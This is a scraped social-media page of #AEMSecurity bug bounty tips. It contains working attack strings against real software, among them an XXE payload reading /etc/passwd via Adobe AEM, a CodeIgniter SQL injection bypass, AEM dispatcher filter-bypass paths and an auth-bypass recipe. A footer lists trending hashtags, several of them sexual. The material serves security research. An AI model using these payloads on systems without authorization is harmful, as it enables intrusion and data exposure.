Top Tweets for #AEMsecurity
AEM guideContainer XXE?
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}}
#AEMSecurity
![AEMSecurity's tweet photo. AEM guideContainer XXE?
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}}
#AEMSecurity https://t.co/Rz9yXQF461](https://pbs.twimg.com/media/GcqrLvrXIAEFI8B.png)
[+] #BugbountyTip Take your time, Do Not Rush!
Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips
![AEMSecurity's tweet photo. [+] #BugbountyTip Take your time, Do Not Rush!
Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips https://t.co/PTLimN1am5](https://pbs.twimg.com/media/GcqkxQmWgAAXpqg.jpg)
A 0-click pre-auth RCE (root) exploit for LiteSpeed CyberPanel was released on 27th October and is being actively exploited. If anyone is still using version 2.3.6? immediately upgrade it to the latest version 2.3.7!
#AEMSecurity #0day #Security
[+] Using Google dorks for unique subdomains?
Try this:
site:*-*-*.yourtarget.com
site:*-*.*.yourtarget.com
site:*.*.*.yourtarget.com
#bugbountytips
#bugbountytip
#AEMSecurity
[+] Payload: validstring+union+select+'1','1','1',@@version+from+tablename--+'`--
A working bypass of codeigniter framework's protection against SQLi
#bugbountytips
#AEMSecurity
#bugbounty
[+] BugbountyTip:
Target hiding behind Cloudflare? Try using Spiderfoot or similar OSINT tools.
9 out out of 10 times I was able to find the original IP subnet of target allowing me to access the website directly! win/win!
#AEMSecurity #bugbountytip #bugbounty
[+] POC Video Microsoft Sharepoint Filter Bypass!
Looking back in time, I found an interesting filter bypass that resulted in a "Stored XSS" vulnerability affecting Microsoft Sharepoint 2013 in Office 365 (cloud)
https://t.co/HmnJuRvdVM
#AEMSecurity #bugbountytips #bugbounty
A custom script written back in 2015 (when I discovered my first AEM bug CVE-2016-0956) still finds valid AEM bugs! amazing!!
#AEMSecurity #bugbountytip
[+] FIlter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;)
#AEMSecurity #FilterBypass #bugbountytips #bugbountytip
![AEMSecurity's tweet photo. [+] FIlter bypass techniques:
Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;)
#AEMSecurity #FilterBypass #bugbountytips #bugbountytip https://t.co/swtZ97OjjS](https://pbs.twimg.com/media/GFgXHe9bwAAKZh9.png)
If you are looking for XSS and come across an input form lets say "description" ? instead of injecting your payload on the very first line, skip the first two i.e. press enter or something and then inject your payload on the next line instead.. #bugbountytips #XSS #AEMSecurity
[+] Auth Bypass:
Find valid endpoints redirecting to login page.
Register new user, provide 1 in all input fields.
SUBMIT form, of course you're going to get an error, IGNORE and simply access endpoints you enumerated earlier...
#bugbountytips
#pentesting
#AEMSecurity
![AEMSecurity's tweet photo. [+] Auth Bypass:
Find valid endpoints redirecting to login page.
Register new user, provide 1 in all input fields.
SUBMIT form, of course you're going to get an error, IGNORE and simply access endpoints you enumerated earlier...
#bugbountytips
#pentesting
#AEMSecurity https://t.co/jzROiHgACn](https://pbs.twimg.com/media/FuYqS4FaIAItx4q.jpg)
Oh and /conten.json too... Idea is simple, just improvise! think like a kid and play around AEM! That's why I've always loved this piece of software so much when it comes to learning different techniques!
#AEMsecurity
[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay
Hunting for JSON GET Servlet on /content.1.json however result = 404?
Try this:
/conten/.1.json
/conten/t.1.json
/content.tidy.1.json
/conten/.tidy.infinity.json
#AEMSecurity #bugbountytips #pentesting
[+] Important Update:
Hi, I know I've been inactive on Twitter since a while and haven't shared much but guess what?
I am back!
Stay tuned!! I will be sharing an amazing AEM dispatcher filter bypass trick that I've used over the years! =)
#AEMSecurity #bugbountytips
[+] Adobe AEM tips and tricks:
At times, encoding special characters within HTTP params allows us to bypass AEM Filters:
POST /content/endpoint
Host: asjas
Blah: blah
Bleh: Bleh
param:body=TEST
Doesnt work? try this:
param%3Abody=TEST<----
#aemsecurity #bugbountytips
Adobe AEM dispatcher filter rules bypass triggered XSS on Linkedin... https://t.co/kxLyxe8Uir via @YouTube #AEMSecurity
Amazed to see CVE-2016-0956 Apache Sling POST Servlet vulnerability discovered back in 2014 still works!!!!!! #AEMSecurity #bugbountytips #bugbountytips
https://t.co/xwh784N2uA <--- me
#AEMSecurity
Amazing it is when & if you are actually able to pull it off in the end with a working POC finally proving your point & getting paid with their highest bounty :) #AEMSecurity
[+] #bugbountytips
You really need to analyze logs manually via "Logger" when Using Burp Suite.
I confirmed 4 HTTP Request smuggling issues + 2 SSRF's and these issues were not flagged by Burp scanner so yup! see what I mean?
#AEMSecurity #bugbountytip
Last Seen Hashtags on Sotwe
incestomamá
Seen from Mexico
maraşbayan
Seen from Turkey
甩奶舞
nolimit nolimit() +filter:native_video
Seen from Brazil
ดาราน่าเย็ด
Seen from Thailand
tolucaescort
Seen from Mexico
titycr
Seen from South Africa
nolimit()**filter:native_video
Seen from Singapore
handjob
Seen from United Kingdom
法尔伽
Seen from United States
Most Popular Users
Elon Musk 
@elonmusk
240.5M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.2M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.3M followers
Lady Gaga
@ladygaga
72.8M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.6M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.3M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers